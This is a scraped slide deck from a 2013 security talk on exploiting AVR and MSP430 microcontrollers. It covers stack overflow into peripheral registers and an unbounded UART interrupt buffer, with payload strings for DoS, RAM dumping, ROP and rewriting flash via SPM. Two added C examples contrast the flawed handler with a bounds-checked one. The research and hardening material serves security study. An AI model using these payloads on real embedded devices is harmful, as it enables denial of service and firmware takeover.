AVR & MSP exploitation

Vadim Bardakov
Security Researcher
Digital Security (ERPScan)
Why now?
• Increasing usage of microcontrollers (uC)
• Nobody cares about code security for these devices
• Increasing amount of easily accessible data channels
• Microcontroller firmware can be retrieved

© 2002—2013, Digital Security
Jokes

What if it works?

Oops…
Firmware extraction

Side channel attacks
• Power analysis
• Planarization
• etc.

MSP430:
• FRAM
• 5xx
• 6xx
RAM

MSP vs AVR memory layout (figure).

AVR data memory, in address order:
• General purpose registers
• I/O Special Function Registers
• Additional I/O registers
• Internal RAM
Stack errors

The figure steps through the AVR data memory map (general purpose registers, I/O Special Function Registers, additional I/O registers, internal RAM) while the stack pointer (SP) moves:

• SP starts at the top of internal RAM; every pushed byte (shown as 0xFF in the figure) moves it toward lower addresses.
• Once the stack has consumed internal RAM it runs into the additional I/O registers and the Special Function Registers (the slide lists the interrupt handlers: UART, timers, comparators, INT0..X), and finally the general purpose registers.
• Stack filled with 0x00: reconfiguring peripheral devices…. Lost control.
• Stack filled with 0x20: reconfiguring peripheral devices…. Seems OK.
• Global variables sit in internal RAM at an unknown offset.
• Bypassing checks: the values the firmware's checks read from internal RAM are overwritten by the stack.
Buffer overflow

Access:
• Local variables
• Return address:
  • Compiler-generated instructions
  • Interruption
  • Bootloader
Buffer overflow

    ISR(UART0_RECEIVE_INTERRUPT)
    {
        UART_RxHead++;
        UART_RxBuf[UART_RxHead] = UART0_DATA;
    }

Typical for UART handlers: the index is never bounds-checked.

print “xff”xB . “x010xFC”xN

Atmel Studio 6.1
    000001FB CLI
    000001FC RJMP PC-0x0000

print “xff”xN

    000001FB CLI
    000001FC RJMP PC-0x0000

DoS
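The handler above bumps UART_RxHead and uses it as an index with no check. As an added example (not from the slides), the following C simulates that handler on a host next to a bounds-checked ring-buffer version; the buffer size, the guard byte and the uart_t layout are constructed for the demonstration.

```c
/* Added example (not from the slides): the UART receive ISR shown above,
 * simulated on a host, beside a bounds-checked ring-buffer version.
 * Names, sizes and the guard byte are constructed for the demonstration. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define RX_BUF_SIZE 16u               /* power of two, so (x & MASK) wraps */
#define RX_BUF_MASK (RX_BUF_SIZE - 1u)
#define GUARD       0xA5u             /* sentinel placed right after the buffer */

/* Simulated data memory: 256 bytes, so an 8-bit index can never leave it.
 * rx_buf is ram[0..RX_BUF_SIZE), and ram[RX_BUF_SIZE] stands in for
 * whatever follows the buffer on a real device (here: the guard byte). */
typedef struct {
    uint8_t  ram[256];
    uint8_t  rx_head;   /* index of the last byte written */
    uint8_t  rx_tail;   /* index of the last byte read */
    unsigned dropped;   /* bytes discarded because the buffer was full */
} uart_t;

static void uart_init(uart_t *u) {
    memset(u, 0, sizeof *u);
    u->ram[RX_BUF_SIZE] = GUARD;
}

/* Handler as on the slide: the head is bumped and used as an index with no
 * check, so the 16th received byte lands on ram[16], past the buffer. */
static int isr_rx_slide(uart_t *u, uint8_t data) {
    u->rx_head++;
    u->ram[u->rx_head] = data;        /* no bounds check */
    return 1;
}

/* Hardened handler: advance with a wrap mask, and refuse to overwrite
 * unread data. Capacity is RX_BUF_SIZE - 1 bytes; extra bytes are dropped
 * and counted so the main loop can notice the overrun. */
static int isr_rx_hardened(uart_t *u, uint8_t data) {
    uint8_t next = (uint8_t)((u->rx_head + 1u) & RX_BUF_MASK);
    if (next == u->rx_tail) {         /* full */
        u->dropped++;
        return 0;
    }
    u->ram[next] = data;
    u->rx_head = next;
    return 1;
}

/* Consumer side, same advance-then-read convention as the hardened ISR. */
static int uart_getc(uart_t *u, uint8_t *out) {
    if (u->rx_tail == u->rx_head) return 0;   /* empty */
    u->rx_tail = (uint8_t)((u->rx_tail + 1u) & RX_BUF_MASK);
    *out = u->ram[u->rx_tail];
    return 1;
}

/* Scenario: fresh UART, n bytes of 0xFF through one handler, then drain.
 * Returns 1 if the guard byte survived. The drain is capped because after
 * the unchecked handler runs off the end, head and tail never meet again. */
static int scenario(int hardened, unsigned n, unsigned *dropped, unsigned *readable) {
    uart_t u;
    uint8_t b;
    unsigned k = 0;
    uart_init(&u);
    for (unsigned i = 0; i < n; i++)
        (hardened ? isr_rx_hardened : isr_rx_slide)(&u, 0xFF);
    while (k < 256 && uart_getc(&u, &b)) k++;
    if (dropped)  *dropped  = u.dropped;
    if (readable) *readable = k;
    return u.ram[RX_BUF_SIZE] == GUARD;
}

int main(void) {
    unsigned d, r;
    printf("slide handler, 15 bytes: guard %s\n",
           scenario(0, 15, &d, &r) ? "intact" : "CLOBBERED");
    printf("slide handler, 16 bytes: guard %s\n",
           scenario(0, 16, &d, &r) ? "intact" : "CLOBBERED");
    printf("hardened, 100 bytes: guard %s, dropped %u, readable %u\n",
           scenario(1, 100, &d, &r) ? "intact" : "CLOBBERED", d, r);
    return 0;
}
```

The dropped counter is the detection hook: a main loop that sees it grow knows the peer is sending faster than the firmware consumes, instead of silently corrupting whatever sits after the buffer.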
Buffer overflow

    ISR(UART0_RECEIVE_INTERRUPT)
    {
        UART_RxHead++;
        UART_RxBuf[UART_RxHead] = UART0_DATA;
    }

    void uart_puts(const char *s)
    {
        while (*s)
            uart_putc(*s++);
    }

print “xff”xB . “x010xFC”xN. P

    uart_puts(p);
    000001C8 LDD R24,Y+1
    000001CA LDD R25,Y+2
    000001CB CALL 0x0000014E

Load indirect with displacement
Load immediate
Call subroutine

Dumping RAM
Reprogramming

Open-source bootloaders suck in production.
Reprogramming

Load code to RAM

print “xff”xB . “x000x16”xN. ROPTail

Interruption handler: ideal for ROP

Gain control to SPM

print Code . “x000xFC”xN. P

Atmex
    +00000343: 95E8
    ….
    +00000351: 95E8

SPM: Store program memory (writing code to FLASH)
Sum

• Simple attacks can be conducted blindly
• Different consequences:
  • DoS
  • Modifying device configuration
  • etc.

Digital Security in Moscow: +7 (495) 223-07-86
Digital Security in Saint Petersburg: +7 (812) 703-15-47
www.dsec.ru
www.erpscan.com
v.bardakov@dsec.ru

 
Nedospasov defcon russia 23
Nedospasov defcon russia 23Nedospasov defcon russia 23
Nedospasov defcon russia 23
 
Advanced cfg bypass on adobe flash player 18 defcon russia 23
Advanced cfg bypass on adobe flash player 18 defcon russia 23Advanced cfg bypass on adobe flash player 18 defcon russia 23
Advanced cfg bypass on adobe flash player 18 defcon russia 23
 
Miasm defcon russia 23
Miasm defcon russia 23Miasm defcon russia 23
Miasm defcon russia 23
 
Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...
Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...
Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...
 
Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях
Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условияхSergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях
Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях
 

Último

"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii SoldatenkoFwdays
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Enterprise Knowledge
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLScyllaDB
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...Fwdays
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr BaganFwdays
 
Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clashcharlottematthew16
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsRizwan Syed
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 3652toLead Limited
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyAlfredo García Lavilla
 
Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piececharlottematthew16
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubKalema Edgar
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Manik S Magar
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsMemoori
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr LapshynFwdays
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Commit University
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machinePadma Pradeep
 
My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024The Digital Insurer
 
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Wonjun Hwang
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024Lorenzo Miniero
 

Último (20)

"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan
 
Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clash
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easy
 
Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piece
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial Buildings
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machine
 
My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024
 
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 

Vadim Bardakov - AVR & MSP exploitation

  • 1. AVR & MSP exploitation. Vadim Bardakov, Security Researcher, Digital Security (ERPScan)
  • 2. Why now? • Increasing usage of uC • Nobody cares about code security for these devices. © 2002—2013, Digital Security
  • 3. Why now? • Increasing usage of uC • Nobody cares about code security for these devices • Increasing amount of easily accessible data channels • Microcontroller firmware can be retrieved
  • 4. Jokes
  • 5. What if it works?
  • 6. Oops…
  • 7. Firmware extraction. Side channel attacks • Power analysis
  • 8. Firmware extraction. Side channel attacks • Power analysis • Planarization • etc.
  • 9. Firmware extraction. MSP430: • FRAM • 5xx • 6xx
  • 10. RAM (diagram: MSP and AVR memory layouts side by side)
  • 11. RAM (diagram of the AVR data space: General purpose registers, I/O Special Function Registers, Additional I/O registers, Internal RAM)
  • 12. Stack errors (same AVR data-space diagram: General purpose registers, I/O Special Function Registers, Additional I/O registers, Internal RAM)
  • 13. Stack errors (memory diagram: SP points into Internal RAM; the stack region is shown filled with 0xff)
  • 14. Stack errors. Interrupt handler: UART, Timers, Comparators, INT0..X (memory diagram: SP, stack region filled with 0xff)
  • 15. Stack errors. Interrupt handler: UART, Timers, Comparators, INT0..X (memory diagram: SP, stack region filled with 0xff, grown one row further)
  • 16–19. Stack errors. Reconfiguring peripheral devices…. Lost control (memory diagram, identical on these four slides: SP, stack region overwritten with 0x00)
  • 20. Stack errors. Reconfiguring peripheral devices…. Seems OK (memory diagram: SP, stack region overwritten with 0x20)
  • 21. Stack errors. Unknown offset: Global Variables (memory diagram: General purpose registers, I/O Special Function Registers, Additional I/O registers, Internal RAM)
  • 22. Stack errors. Bypassing checks (same memory diagram)
  • 23. Buffer overflow. Access: • Local variables • Return address: • Compiler-generated instructions • Interrupt • Bootloader
  • 24. Buffer overflow. Casual for UART handlers:
        ISR(UART0_RECEIVE_INTERRUPT) {
            UART_RxHead++;
            UART_RxBuf[UART_RxHead] = UART0_DATA;
        }
  • 25. Buffer overflow. Same ISR as slide 24. Payload as shown on the slide: print “xff”xB . “x010xFC”xN. Atmel Studio 6.1 disassembly: 000001FB CLI / 000001FC RJMP PC-0x0000
  • 26. Buffer overflow. Same ISR. Payload as shown on the slide: print “xff”xN. Disassembly: 000001FB CLI / 000001FC RJMP PC-0x0000
  • 27. Buffer overflow. Same ISR and payload as slide 26; disassembly 000001FB CLI / 000001FC RJMP PC-0x0000. Result: DoS
  • 28. Buffer overflow. Same ISR plus:
        void uart_puts(const char *s) {
            while (*s) uart_putc(*s++);
        }
        Payload as shown on the slide: print “xff”xB . “x010xFC”xN . P; then uart_puts(p);
        Disassembly: 000001C8 LDD R24,Y+1 / 000001CA LDD R25,Y+2 / 000001CB CALL 0x0000014E (slide labels: Load indirect with displacement, Load immediate, Call subroutine). Result: Dumping RAM
  • 29. Reprogramming
  • 30. Reprogramming. Open-source bootloaders suck in production.
  • 31. Reprogramming. Load code to RAM. Payload as shown on the slide: print “xff”xB . “x000x16”xN . ROPTail. Interrupt handler: ideal for ROP
  • 32. Reprogramming. Gain control to SPM. Payload as shown on the slide: print Code . “x000xFC”xN . P. Atmex disassembly: +00000343: 95E8 SPM (Store program memory) …. +00000351: 95E8 SPM (Store program memory). Result: Writing code to FLASH
  • 33. Summary • Simple attacks can be conducted blindly • Different consequences: • DoS • Modifying device configuration • etc.
  • 34. Digital Security in Moscow: +7 (495) 223-07-86. Digital Security in Saint Petersburg: +7 (812) 703-15-47. www.dsec.ru, www.erpscan.com, v.bardakov@dsec.ru
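As an added example that is not part of the deck: a host-side C model of the UART receive ISR from slides 24–28 next to a bounds-checked version, showing how the unmasked UART_RxHead index carries stores past UART_RxBuf into whatever follows it, and how masking the index plus a full check keeps every store inside the buffer. The buffer size, its position in the model SRAM, and the sentinel pattern are constructed for this model, not taken from the slides.

```c
/* Added example (not from the slides): a host-side model of the UART receive ISR
 * from slides 24-28 beside a bounds-checked version. "ram" stands in for AVR SRAM;
 * UART_RxBuf is a 16-byte window inside it, followed by a sentinel pattern that
 * stands in for whatever variables sit after the buffer on a real device. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#define RX_BUF_SIZE   16                          /* power of two, so the mask works */
#define RX_BUF_MASK   (RX_BUF_SIZE - 1)
#define RX_BUF_BASE   0x40                        /* constructed position of UART_RxBuf */
#define SENTINEL_BASE (RX_BUF_BASE + RX_BUF_SIZE) /* first byte after the buffer */
typedef struct {
    uint8_t  ram[512];   /* model of SRAM, large enough for base + 255 */
    uint8_t  head;       /* UART_RxHead: 8-bit, as in the slide's ISR */
    uint8_t  tail;       /* consumer index, used by the hardened handler only */
    unsigned dropped;    /* bytes rejected because the buffer was full */
} uart_model_t;

void uart_init(uart_model_t *u) {
    memset(u, 0, sizeof *u);
    memset(u->ram + SENTINEL_BASE, 0xA5, sizeof u->ram - SENTINEL_BASE);
}

/* As on the slides: the index is never wrapped, so from the 17th byte on the
 * store lands past UART_RxBuf into whatever follows it in SRAM. */
void isr_rx_vulnerable(uart_model_t *u, uint8_t data) {
    u->head++;
    u->ram[RX_BUF_BASE + u->head] = data;
}

/* Bounds-checked version: the index is masked to the buffer size and a byte is
 * dropped (and counted) when the buffer is full, so the store cannot leave
 * UART_RxBuf. Returns 1 if stored, 0 if dropped. */
int isr_rx_hardened(uart_model_t *u, uint8_t data) {
    uint8_t next = (uint8_t)((u->head + 1) & RX_BUF_MASK);
    if (next == u->tail) {    /* full: one slot stays free to tell full from empty */
        u->dropped++;
        return 0;
    }
    u->head = next;
    u->ram[RX_BUF_BASE + next] = data;
    return 1;
}

/* Push n constructed bytes through one handler, then count sentinel bytes
 * outside the buffer that were overwritten. */
unsigned feed_and_count_clobbered(uart_model_t *u, int hardened, unsigned n) {
    for (unsigned i = 0; i < n; i++) {
        uint8_t b = (uint8_t)('0' + i % 10);   /* ASCII digits, never 0xA5 */
        if (hardened) isr_rx_hardened(u, b); else isr_rx_vulnerable(u, b);
    }
    unsigned clobbered = 0;
    for (size_t a = SENTINEL_BASE; a < sizeof u->ram; a++)
        if (u->ram[a] != 0xA5) clobbered++;
    return clobbered;
}

int main(void) {
    uart_model_t v, h;
    uart_init(&v); uart_init(&h);
    unsigned cv = feed_and_count_clobbered(&v, 0, 40);
    unsigned ch = feed_and_count_clobbered(&h, 1, 40);
    printf("vulnerable: %u bytes clobbered past the buffer\n", cv);   /* 25 */
    printf("hardened:   %u clobbered, %u dropped\n", ch, h.dropped);  /* 0, 25 */
    return 0;
}
```

With 40 input bytes the unmasked handler overwrites 25 bytes beyond the buffer, while the masked handler stores 15, drops 25 and never touches the sentinel region.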